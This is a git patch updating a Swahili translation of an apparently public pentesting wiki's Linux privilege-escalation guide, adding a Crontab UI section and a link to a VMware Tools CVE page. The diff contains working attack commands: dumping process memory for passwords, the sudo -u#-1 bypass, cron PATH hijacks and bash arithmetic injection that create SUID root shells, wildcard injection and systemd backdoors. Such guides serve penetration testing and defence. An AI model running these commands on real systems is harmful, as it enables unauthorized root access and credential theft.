From 84d15d19433069470898de51787811a65873edb1 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 1 Oct 2025 10:25:40 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-web/vmware-esx-v --- src/SUMMARY.md | 1 + .../privilege-escalation/README.md | 645 ++++++++++-------- ...ry-untrusted-search-path-cve-2025-41244.md | 146 ++++ .../pentesting-web/vmware-esx-vcenter....md | 19 +- 4 files changed, 507 insertions(+), 304 deletions(-) create mode 100644 src/linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 79f641eab..6d276923d 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -110,6 +110,7 @@ - [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md) - [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md) - [Android Rooting Frameworks Manager Auth Bypass Syscall Hook](linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md) + - [Vmware Tools Service Discovery Untrusted Search Path Cve 2025 41244](linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md) - [Arbitrary File Write to Root](linux-hardening/privilege-escalation/write-to-root.md) - [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md) - [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md) diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 23d7df3e5..5d02dd8d4 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -6,7 +6,7 @@ ### Taarifa za OS -Hebu tuanze kupata taarifa kuhusu OS inayokimbia +Tuanze kupata maarifa kuhusu OS inayokimbia ```bash (cat /proc/version || uname -a ) 2>/dev/null lsb_release -a 2>/dev/null # old, not by default on many systems @@ -14,38 +14,38 @@ cat /etc/os-release 2>/dev/null # universal on modern systems ``` ### Path -Ikiwa **una ruhusa za kuandika kwenye folda yoyote ndani ya `PATH`**, unaweza kuwa na uwezo wa hijack baadhi ya libraries or binaries: +Ikiwa una **ruhusa za kuandika kwenye saraka yoyote ndani ya `PATH`**, huenda ukaweza hijack baadhi ya libraries au binaries: ```bash echo $PATH ``` -### Taarifa za mazingira +### Taarifa za Env -Je, kuna taarifa za kuvutia, passwords au API keys katika environment variables? +Je, kuna taarifa za kuvutia, nywila au API keys katika environment variables? ```bash (env || set) 2>/dev/null ``` ### Kernel exploits -Angalia toleo la kernel na kama kuna exploit ambayo inaweza kutumika ku-escalate privileges. +Angalia toleo la kernel na kama kuna exploit yoyote ambayo inaweza kutumika ku-escalate privileges ```bash cat /proc/version uname -a searchsploit "Linux Kernel" ``` -Unaweza kupata orodha nzuri ya kernels zilizo hatarini na baadhi ya **compiled exploits** tayari hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\ +Unaweza kupata orodha nzuri ya kernel zilizo dhaifu na baadhi ya **compiled exploits** tayari hapa: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) na [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\ Tovuti nyingine ambapo unaweza kupata baadhi ya **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) -Ili kutoa matoleo yote ya kernel zilizo hatarini kutoka kwenye tovuti hiyo unaweza kufanya: +Ili kutoa matoleo yote ya kernel yaliyo dhaifu kutoka kwenye tovuti hiyo unaweza kufanya: ```bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' ``` -Zana ambazo zinaweza kusaidia kutafuta kernel exploits ni: +Zana zinazoweza kusaidia kutafuta kernel exploits ni: [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\ [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\ -[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (endesha ndani ya victim, hukagua tu exploits za kernel 2.x) +[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (execute IN victim,only checks exploits for kernel 2.x) -Daima **tafuta toleo la kernel kwenye Google**, labda toleo la kernel lako limeandikwa katika exploit fulani ya kernel na hivyo utakuwa na uhakika kwamba exploit hiyo inafanya kazi. +Daima **tafuta kernel version kwenye Google**, pengine kernel version yako imeandikwa katika kernel exploit fulani na utakuwa na uhakika kwamba exploit hiyo ni halali. ### CVE-2016-5195 (DirtyCow) @@ -59,7 +59,7 @@ https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` ### Toleo la Sudo -Kulingana na toleo za sudo zilizo na udhaifu zinazoonekana katika: +Kulingana na matoleo ya sudo yenye udhaifu yanayoonekana katika: ```bash searchsploit sudo ``` @@ -73,13 +73,13 @@ Kutoka kwa @sickrov ``` sudo -u#-1 /bin/bash ``` -### Dmesg signature verification failed +### Dmesg: ukaguzi wa saini ulishindwa -Angalia **smasher2 box of HTB** kwa **mfano** wa jinsi vuln hii inavyoweza ku-exploited +Angalia **smasher2 box of HTB** kwa **mfano** jinsi vuln hii ingeweza kutumiwa. ```bash dmesg 2>/dev/null | grep "signature" ``` -### Kukusanya taarifa zaidi za mfumo +### Zaidi ya system enumeration ```bash date 2>/dev/null #Date (df -h || lsblk) #System stats @@ -125,14 +125,13 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null Ikiwa uko ndani ya docker container unaweza kujaribu kutoroka kutoka ndani yake: - {{#ref}} docker-security/ {{#endref}} ## Diski -Angalia **what is mounted and unmounted**, wapi na kwa nini. Ikiwa chochote kime-unmounted unaweza kujaribu ku-mount na kukagua taarifa binafsi. +Angalia **what is mounted and unmounted**, wapi na kwa nini. Ikiwa kitu chochote kimekuwa unmounted, unaweza kujaribu kukimount na kuangalia taarifa za kibinafsi ```bash ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null @@ -145,56 +144,56 @@ Orodhesha binaries muhimu ```bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` -Pia, angalia kama **any compiler is installed**. Hii ni muhimu ikiwa unahitaji kutumia baadhi ya kernel exploit, kwani inashauriwa compile it kwenye mashine utakayotumia (au kwenye ile inayofanana). +Pia, angalia kama **any compiler is installed**. Hii ni muhimu ikiwa unahitaji kutumia kernel exploit, kwani inapendekezwa ku-compile katika mashine utakayoitumia (au katika ile inayofanana). ```bash (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") ``` -### Programu Zenye Udhaifu Imewekwa +### Programu Zenye Udhaifu Zilizowekwa -Angalia **toleo la vifurushi na huduma zilizowekwa**. Huenda kuna toleo la zamani la Nagios (kwa mfano) that could be exploited for escalating privileges…\ -Inashauriwa kukagua kwa mkono toleo la programu zilizowekwa ambazo zinaonekana kuwa za kutiliwa shaka zaidi. +Chunguza **toleo la vifurushi na huduma zilizowekwa**. Labda kuna toleo la zamani la Nagios (kwa mfano) ambalo linaweza kutumika kuinua ruhusa…\ +Inashauriwa kukagua kwa mkono toleo la programu zinazo shukiwa zaidi zilizowekwa. ```bash dpkg -l #Debian rpm -qa #Centos ``` -Ikiwa una ufikiaji wa SSH kwenye mashine unaweza pia kutumia **openVAS** kuangalia programu zilizo za zamani na zilizo hatarini zilizosakinishwa ndani ya mashine. +Ikiwa una ufikiaji wa SSH kwa mashine unaweza pia kutumia **openVAS** kuangalia programu zisizosasishwa na zilizo hatarini zilizosakinishwa kwenye mashine. -> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa kawaida hazitakuwa na maana, kwa hivyo inapendekezwa kutumia programu kama OpenVAS au nyingine zinazofanana zitakazokagua kama toleo lolote la programu iliyosakinishwa linaloweza kuwa dhaifu kwa exploits zilizojulikana_ +> [!NOTE] > _Kumbuka kwamba amri hizi zitaonyesha taarifa nyingi ambazo kwa kawaida hazitakuwa na faida; kwa hiyo inashauriwa kutumia programu kama OpenVAS au nyingine zilizo sawa ambazo zitakagua ikiwa toleo lolote la programu lililosakinishwa linaloweza kuathiriwa na exploits zilizojulikana_ ## Michakato -Angalia **michakato gani** inaendeshwa na ukague kama kuna mchakato wowote unao **uruhusa zaidi kuliko inavyostahili** (labda tomcat inaendeshwa na root?) +Tazama **ni michakato gani** inaendeshwa na angalia kama mchakato wowote una **idhinisho zaidi kuliko inavyostahili** (labda tomcat inaendeshwa na root?) ```bash ps aux ps -ef top -n 1 ``` -Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** inavibaini kwa kukagua vigezo vya `--inspect` ndani ya mstari wa amri wa mchakato.\ -Pia **kagua ruhusa zako kwenye binaries za mchakato**, labda unaweza kuandika juu ya faili za wengine. +Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\ +Pia **angalia ruhusa zako juu ya binaries za mchakato**, labda unaweza ku-overwrite faili ya mtu mwingine. -### Process monitoring +### Ufuatiliaji wa mchakato -Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia michakato. Hii inaweza kuwa muhimu sana kutambua michakato dhaifu inayotekelezwa mara kwa mara au wakati seti ya masharti yanatimizwa. +Unaweza kutumia zana kama [**pspy**](https://github.com/DominicBreuker/pspy) kufuatilia michakato. Hii inaweza kuwa muhimu sana kutambua michakato iliyo dhaifu inayotekelezwa mara kwa mara au wakati vigezo fulani vinapotimizwa. -### Process memory +### Kumbukumbu ya mchakato -Baadhi ya huduma za server huhifadhi **nywila na vitambulisho kwa maandishi wazi ndani ya kumbukumbu**.\ -Kwa kawaida utahitaji **root privileges** kusoma kumbukumbu ya michakato inayomilikiwa na watumiaji wengine, hivyo hii kwa kawaida ni muhimu zaidi unapokuwa tayari root na unataka kugundua nywila/vitambulisho zaidi.\ -Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma kumbukumbu ya michakato unayomiliki**. +Baadhi ya huduma za server huhifadhi **credentials kwa maandishi wazi ndani ya kumbukumbu**.\ +Kawaida utahitaji **root privileges** kusoma kumbukumbu za michakato zinazomilikiwa na watumiaji wengine, kwa hivyo hii kwa kawaida inakuwa muhimu zaidi wakati tayari uko root na unataka kugundua credentials zaidi.\ +Hata hivyo, kumbuka kwamba **kama mtumiaji wa kawaida unaweza kusoma kumbukumbu za michakato unazomiliki**. > [!WARNING] -> Kumbuka kwamba kwa sasa mashine nyingi **haziruhusu ptrace kwa chaguo-msingi** jambo linalomaanisha huwezi kutupa dump ya michakato ya watumiaji wako wasio na ruhusa. +> Kumbuka kwamba siku hizi mashine nyingi **haziruhusu ptrace kwa default** ambacho kinamaanisha huwezi kufanya dump ya michakato mingine inayomilikiwa na mtumiaji wako asiye na ruhusa za juu. > > The file _**/proc/sys/kernel/yama/ptrace_scope**_ controls the accessibility of ptrace: > -> - **kernel.yama.ptrace_scope = 0**: michakato yote inaweza kudebugiwa, mradi tu zina uid sawa. Hii ndiyo njia ya jadi jinsi ptracing ilivyofanya kazi. -> - **kernel.yama.ptrace_scope = 1**: mchakato mzazi tu anaweza kudebugiwa. -> - **kernel.yama.ptrace_scope = 2**: Ni admin peke yake ndiye anayeweza kutumia ptrace, kwani inahitaji uwezo wa CAP_SYS_PTRACE. -> - **kernel.yama.ptrace_scope = 3**: Hakuna mchakato unaoweza kufuatiliwa kwa ptrace. Ukichomwa hivi, inahitaji reboot ili kuwezesha ptracing tena. +> - **kernel.yama.ptrace_scope = 0**: michakato yote inaweza kudebugged, mradi tu zinauid sawa. Huu ni utaratibu wa jadi wa jinsi ptracing ilivyofanya kazi. +> - **kernel.yama.ptrace_scope = 1**: mchakato mzazi pekee unaweza kudebugged. +> - **kernel.yama.ptrace_scope = 2**: Msimamizi (admin) peke yake anaweza kutumia ptrace, kwani inahitaji uwezo wa CAP_SYS_PTRACE. +> - **kernel.yama.ptrace_scope = 3**: Hakuna michakato inayoweza kufuatiliwa kwa ptrace. Mara imewekwa, reboot inahitajika ili kuwezesha ptracing tena. #### GDB -Ikiwa una ufikiaji wa kumbukumbu ya huduma ya FTP (kwa mfano) unaweza kupata Heap na kutafuta ndani yake nywila/vitambulisho. +Ikiwa una ufikiaji wa kumbukumbu za huduma ya FTP (kwa mfano) unaweza kupata Heap na kutafuta ndani yake credentials. ```bash gdb -p (gdb) info proc mappings @@ -203,7 +202,7 @@ gdb -p (gdb) q strings /tmp/mem_ftp #User and password ``` -#### GDB Script +#### GDB Skripti ```bash:dump-memory.sh #!/bin/bash #./dump-memory.sh @@ -216,7 +215,7 @@ done ``` #### /proc/$pid/maps & /proc/$pid/mem -Kwa ID ya mchakato fulani, **maps zinaonyesha jinsi kumbukumbu imepangwa ndani ya nafasi ya anwani pepe ya mchakato huo;** pia inaonyesha **idhini za kila eneo lililopangwa**. Faili ya pseudo **mem** **inafunua kumbukumbu ya mchakato yenyewe**. Kutoka kwenye faili ya **maps** tunajua ni **mikoa ya kumbukumbu inayosomeka** na ofseti zao. Tunatumia taarifa hii **kuingia kwenye faili ya mem na kuandika maeneo yote yanayosomwa** kwenye faili. +Kwa kitambulisho kilichotolewa cha mchakato (PID), **maps yanaonyesha jinsi kumbukumbu (memory) imepangwa ndani ya virtual address space ya mchakato huo**; pia yanaonyesha **permissions za kila eneo lililowekwa**. Faili pseudo ya **mem** **inaonyesha kumbukumbu ya mchakato yenyewe**. Kutoka kwa faili ya **maps** tunajua ni **eneo gani za kumbukumbu zinazoweza kusomwa** na ofseti zao. Tunatumia taarifa hizi ku-**seek** ndani ya faili ya **mem** na **dump** maeneo yote yanayosomwa kwenye faili. ```bash procdump() ( @@ -231,14 +230,14 @@ rm $1*.bin ``` #### /dev/mem -`/dev/mem` hutoa ufikaji kwa kumbukumbu ya **kimwili** ya mfumo, sio kumbukumbu ya virtual. Nafasi ya anwani ya virtual ya kernel inaweza kupatikana kwa kutumia /dev/kmem.\ -Kwa kawaida, `/dev/mem` inasomwa tu na **root** na kikundi cha kmem. +`/dev/mem` hutoa ufikiaji kwa kumbukumbu ya mfumo ya **kimwili**, si kumbukumbu ya virtual. Eneo la anwani la kernel la virtual linaweza kufikiwa kwa kutumia /dev/kmem.\ +Kawaida, `/dev/mem` inaweza kusomwa tu na **root** na kikundi cha **kmem**. ``` strings /dev/mem -n10 | grep -i PASS ``` -### ProcDump kwa linux +### ProcDump for linux -ProcDump ni toleo la Linux la zana ya klasiki ProcDump kutoka kwenye suite ya zana za Sysinternals za Windows. Pata hapa [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) +ProcDump ni toleo la Linux lililofikiriwa upya la zana ya klasiki ProcDump kutoka kwenye suite ya zana za Sysinternals kwa Windows. Pata katika [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) ``` procdump -p 1714 @@ -265,40 +264,40 @@ Press Ctrl-C to end monitoring without terminating the process. [20:20:58 - INFO]: Timed: [20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714 ``` -### Vifaa +### Zana -Ili dump a process memory unaweza kutumia: +Ili dump process memory unaweza kutumia: - [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux) - [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Unaweza kwa mkono kuondoa mahitaji ya root na dump process inayomilikiwa na wewe - Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root inahitajika) -### Vyeti kutoka Process Memory +### Nyaraka za kuingia kutoka kwenye Process Memory -#### Mfano la mkono +#### Mfano kwa mkono -Ikiwa unagundua kuwa mchakato wa authenticator unaendelea kukimbia: +Ikiwa utagundua kuwa authenticator process inaendeshwa: ```bash ps -ef | grep "authenticator" root 2027 2025 0 11:46 ? 00:00:00 authenticator ``` -Unaweza dump process (angalia sehemu za awali ili kupata njia tofauti za dump memory ya process) na kutafuta credentials ndani ya memory: +Unaweza kupiga dump mchakato (angalia sehemu za awali ili kupata njia tofauti za kupiga dump kumbukumbu za mchakato) na kutafuta nyaraka za kuingia ndani ya kumbukumbu: ```bash ./dump-memory.sh 2027 strings *.dump | grep -i password ``` #### mimipenguin -The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) kitapora **alama za kuingia za maandishi wazi kutoka kwenye kumbukumbu** na kutoka kwa baadhi ya **mafayela yanayojulikana**. Kinahitaji ruhusa za root ili kifanye kazi ipasavyo. +Zana [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) itapora **nywila za maandishi wazi kutoka kwenye kumbukumbu** na kutoka kwa baadhi ya **faili zinazojulikana**. Inahitaji ruhusa za root ili ifanye kazi ipasavyo. -| Kipengele | Jina la mchakato | +| Sifa | Jina la Mchakato | | ------------------------------------------------- | -------------------- | -| GDM password (Kali Desktop, Debian Desktop) | gdm-password | +| Nenosiri la GDM (Kali Desktop, Debian Desktop) | gdm-password | | Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon | | LightDM (Ubuntu Desktop) | lightdm | -| VSFTPd (Active FTP Connections) | vsftpd | -| Apache2 (Active HTTP Basic Auth Sessions) | apache2 | -| OpenSSH (Active SSH Sessions - Sudo Usage) | sshd: | +| VSFTPd (Muunganisho hai za FTP) | vsftpd | +| Apache2 (Vikao vya HTTP Basic Auth vinavyofanya kazi) | apache2 | +| OpenSSH (Vikao hai za SSH - Matumizi ya sudo) | sshd: | #### Regex za Utafutaji/[truffleproc](https://github.com/controlplaneio/truffleproc) ```bash @@ -314,37 +313,66 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1... # finding secrets # results in /tmp/tmp.o6HV0Pl3fe/results.txt ``` -## Zilizopangwa/Cron jobs +## Iliyopangwa/Cron jobs -Angalia kama kuna Cron job yoyote yenye udhaifu. Labda unaweza kunufaika na script inayotekelezwa na root (wildcard vuln? unaweza kubadilisha faili zinazotumiwa na root? tumia symlinks? unda faili maalum katika directory inayotumiwa na root?). +### Crontab UI (alseambusher) running as root – web-based scheduler privesc + +Ikiwa paneli ya wavuti “Crontab UI” (alseambusher/crontab-ui) inayoendesha kama root na imefungwa kwa loopback pekee, bado unaweza kuifikia kupitia SSH local port-forwarding na kuunda privileged job ili kupandisha hadhi. + +Typical chain +- Gundua porti iliyo kwenye loopback pekee (e.g., 127.0.0.1:8000) na Basic-Auth realm kupitia `ss -ntlp` / `curl -v localhost:8000` +- Pata credentials katika operational artifacts: +- Backups/scripts na `zip -P ` +- systemd unit inayofichua `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."` +- Fungua tunnel na ingia: +```bash +ssh -L 9001:localhost:8000 user@target +# browse http://localhost:9001 and authenticate +``` +- Tengeneza job yenye ruhusa za juu na iendeshe mara moja (inatoa SUID shell): +```bash +# Name: escalate +# Command: +cp /bin/bash /tmp/rootshell && chmod 6777 /tmp/rootshell +``` +- Tumia: +```bash +/tmp/rootshell -p # root shell +``` +Kuimarisha +- Usiruhusu Crontab UI iendeshe kama root; itenge kwa mtumiaji maalum na ruhusa ndogo +- Unganisha kwa localhost na kwa ziada zuia upatikanaji kwa firewall/VPN; usitumie tena nywila +- Epuka kuweka secrets ndani ya unit files; tumia secret stores au EnvironmentFile inayotumika kwa root pekee +- Wezesha audit/logging kwa utekelezaji wa kazi za on-demand + +Angalia kama kazi yoyote iliyopangwa ina udhaifu. Labda unaweza kuchukua faida ya script inayotekelezwa na root (wildcard vuln? unaweza kubadilisha files ambazo root anazitumia? tumia symlinks? tengeneza faili maalum katika directory ambayo root anaitumia?). ```bash crontab -l ls -al /etc/cron* /etc/at* cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#" ``` -### Cron path +### PATH ya Cron Kwa mfano, ndani ya _/etc/crontab_ unaweza kupata PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ -(_Kumbuka jinsi mtumiaji "user" ana ruhusa za kuandika kwenye /home/user_) +(_Kumbuka jinsi mtumiaji "user" ana vibali vya kuandika juu ya /home/user_) -Iwapo ndani ya crontab hii mtumiaji root atajaribu kutekeleza amri au script bila kuweka PATH. Kwa mfano: _\* \* \* \* root overwrite.sh_\ -Kisha, unaweza kupata shell ya root kwa kutumia: +Ikiwa ndani ya crontab hii mtumiaji root anajaribu kutekeleza amri au script bila kuweka PATH. Kwa mfano: _\* \* \* \* root overwrite.sh_\ +Basi, unaweza kupata shell ya root kwa kutumia: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh #Wait cron job to be executed /tmp/bash -p #The effective uid and gid to be set to the real uid and gid ``` -### Cron inavyotumia script yenye wildcard (Wildcard Injection) +### Cron kutumia script yenye wildcard (Wildcard Injection) -Iwapo script inatekelezwa na root ina “**\***” ndani ya amri, unaweza kuitumia kufanya mambo yasiyotegemewa (kama privesc). Mfano: +Ikiwa script inayotekelezwa na root ina “**\***” ndani ya amri, unaweza kuitumia kufanya mambo yasiyotegemewa (kama privesc). Mfano: ```bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script ``` -**Ikiwa wildcard imewekwa mbele ya path kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **sio).** - -Read the following page for more wildcard exploitation tricks: +**Ikiwa wildcard imeambatanishwa na njia kama** _**/some/path/\***_ **, haitakuwa hatarini (hata** _**./\***_ **si hatari).** +Soma ukurasa ufuatao kwa mbinu zaidi za kutumia wildcard: {{#ref}} wildcards-spare-tricks.md @@ -353,9 +381,9 @@ wildcards-spare-tricks.md ### Bash arithmetic expansion injection in cron log parsers -Bash hufanya parameter expansion na command substitution kabla ya arithmetic evaluation katika ((...)), $((...)) na let. Ikiwa root cron/parser inasoma field za log zisizo salama na kuziingiza kwenye muktadha wa arithmetic, mshambuliaji anaweza kuingiza command substitution $(...) ambayo itaendeshwa kama root wakati cron inapokimbia. +Bash hufanya parameter expansion na command substitution kabla ya arithmetic evaluation katika ((...)), $((...)) na let. Ikiwa cron/parser ya root inasoma field za log zisizotegemewa na kuziingiza kwenye arithmetic context, mshambuliaji anaweza kuingiza command substitution $(...) ambayo itaendeshwa kama root wakati cron inafanya kazi. -- Kwanini inafanya kazi: In Bash, expansions occur in this order: parameter/variable expansion, command substitution, arithmetic expansion, then word splitting and pathname expansion. Kwa hivyo thamani kama `$(/bin/bash -c 'id > /tmp/pwn')0` kwanza inabadilishwa (ikiendesha amri), kisha `0` ya nambari inayobaki inatumiwa kwa arithmetic ili script iendelee bila makosa. +- Why it works: In Bash, expansions occur in this order: parameter/variable expansion, command substitution, arithmetic expansion, then word splitting and pathname expansion. So a value like `$(/bin/bash -c 'id > /tmp/pwn')0` is first substituted (running the command), then the remaining numeric `0` is used for the arithmetic so the script continues without errors. - Typical vulnerable pattern: ```bash @@ -367,7 +395,7 @@ while IFS=',' read -r ts user count rest; do done < /var/www/app/log/application.log ``` -- Utekelezaji: Pata maandishi yanayodhibitiwa na mshambuliaji yaliandikwe kwenye log inayochambuliwa ili uwanja unaoonekana kama nambari uwe na command substitution na uishe kwa tarakimu. Hakikisha amri yako haisababishi uchapishaji kwenye stdout (au uielekeze) ili arithmetic ibaki halali. +- Exploitation: Weka maandishi yanayodhibitiwa na mshambuliaji katika log inayochunguzwa, ili field inayofanana na namba iwe na command substitution na mwisho wake uwe tarakimu. Hakikisha amri yako haisidia kuandika chochote kwenye stdout (au uirekebishe/redirect) ili arithmetic iwe halali. ```bash # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim): $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0 @@ -382,15 +410,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > #Wait until it is executed /tmp/bash -p ``` -Ikiwa script inayotekelezwa na root inatumia **directory ambapo una ufikiaji kamili**, inaweza kuwa ya manufaa kufuta folder hiyo na **kuunda symlink folder kuelekea nyingine** inayohudumia script inayodhibitiwa na wewe +Iwapo script inayotekelezwa na root inatumia **directory ambapo una upatikanaji kamili**, labda inaweza kuwa ya msaada kufuta folder hiyo na **kuunda symlink folder kuelekea nyingine** inayohudumia script inayodhibitiwa na wewe ```bash ln -d -s ``` -### Jobs za cron zinazojirudia mara kwa mara +### Cron jobs za mara kwa mara -Unaweza kufuatilia michakato ili kutafuta michakato zinazotekelezwa kila dakika 1, 2 au 5. Labda unaweza kulitumia kupata ruhusa za juu. +Unaweza kufuatilia michakato kutafuta zile zinazotekelezwa kila dakika 1, 2 au 5. Huenda ukaweza kuchukua fursa yake na escalate privileges. -Kwa mfano, ili **fuatilia kila 0.1s kwa dakika 1**, **panga kwa amri zilizotekelezwa kidogo** na kufuta amri ambazo zimefanywa zaidi, unaweza kufanya: +Kwa mfano, ili **kufuatilia kila 0.1s kwa muda wa dakika 1**, **kupanga kwa amri zenye utekelezaji mdogo** na kufuta amri zilizotekelezwa zaidi, unaweza kufanya: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` @@ -398,40 +426,41 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do ### Cron jobs zisizoonekana -Inawezekana kuunda cronjob kwa **kuweka carriage return baada ya comment** (bila karakteri ya newline), na cron job itafanya kazi. Mfano (kumbuka karakteri ya carriage return): +Inawezekana kuunda cronjob kwa **kuweka carriage return baada ya comment** (bila newline character), na cronjob itaenda kazi. Mfano (zingatia carriage return char): ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` ## Huduma -### Mafaili ya _.service_ yanayoweza kuandikwa +### Mafaili yanayoweza kuandikwa _.service_ -Angalia kama unaweza kuandika faili yoyote ya `.service`, ikiwa unaweza, **unaweza kuibadilisha** ili **itekeleze** backdoor yako wakati huduma **inapoanza**, **inapoanzishwa upya** au **inaposimama** (huenda utahitaji kusubiri hadi mashine ianzishwe upya).\ -Kwa mfano tengeneza backdoor yako ndani ya faili ya `.service` kwa **`ExecStart=/tmp/script.sh`** +Angalia kama unaweza kuandika faili yoyote ya `.service`; ikiwa unaweza, unaweza **kuibadilisha** ili i **itekeleze** backdoor yako wakati huduma inapo **anzishwa**, **izinduliwa upya** au **isimamishwe** (labda utahitaji kusubiri hadi mashine ianze upya).\ -### Mabinary za huduma yanayoweza kuandikwa +Kwa mfano, tengeneza backdoor yako ndani ya faili ya .service kwa **`ExecStart=/tmp/script.sh`** -Kumbuka kwamba ikiwa una **write permissions over binaries being executed by services**, unaweza kuziibadilisha kwa backdoors ili wakati services zitakaporudi kutekelezwa backdoors zitatumika. +### Binary za huduma zinazoweza kuandikwa -### systemd PATH - Njia za Kihusiano +Kumbuka kwamba ikiwa una **idhini ya kuandika juu ya binaries zinazotekelezwa na huduma**, unaweza kuzibadilisha ili kuweka backdoor; hivyo, huduma zitakaporudi kutekelezwa backdoor zitatumika. + +### systemd PATH - Relative Paths Unaweza kuona PATH inayotumika na **systemd** kwa: ```bash systemctl show-environment ``` -Ikiwa utagundua kwamba unaweza **write** katika yoyote ya folda za njia, huenda ukaweza **escalate privileges**. Unahitaji kutafuta **relative paths being used on service configurations** katika faili kama: +Iwapo utagundua kwamba unaweza **write** katika yoyote ya folda za njia hiyo, huenda ukaweza **escalate privileges**. Unahitaji kutafuta **relative paths being used on service configurations** faili kama: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` -Then, create an **executable** with the **same name as the relative path binary** inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action (**Start**, **Stop**, **Reload**), your **backdoor will be executed** (unprivileged users usually cannot start/stop services but check if you can use `sudo -l`). +Kisha, tengeneza **executable** yenye **jina sawa na relative path binary** ndani ya systemd PATH folder ambayo unaweza kuandika, na wakati service itakapoulizwa kutekeleza kitendo dhaifu (**Start**, **Stop**, **Reload**), **backdoor** yako itaendeshwa (watumiaji wasio na ruhusa kawaida hawawezi kuanza/kuacha services lakini angalia kama unaweza kutumia `sudo -l`). 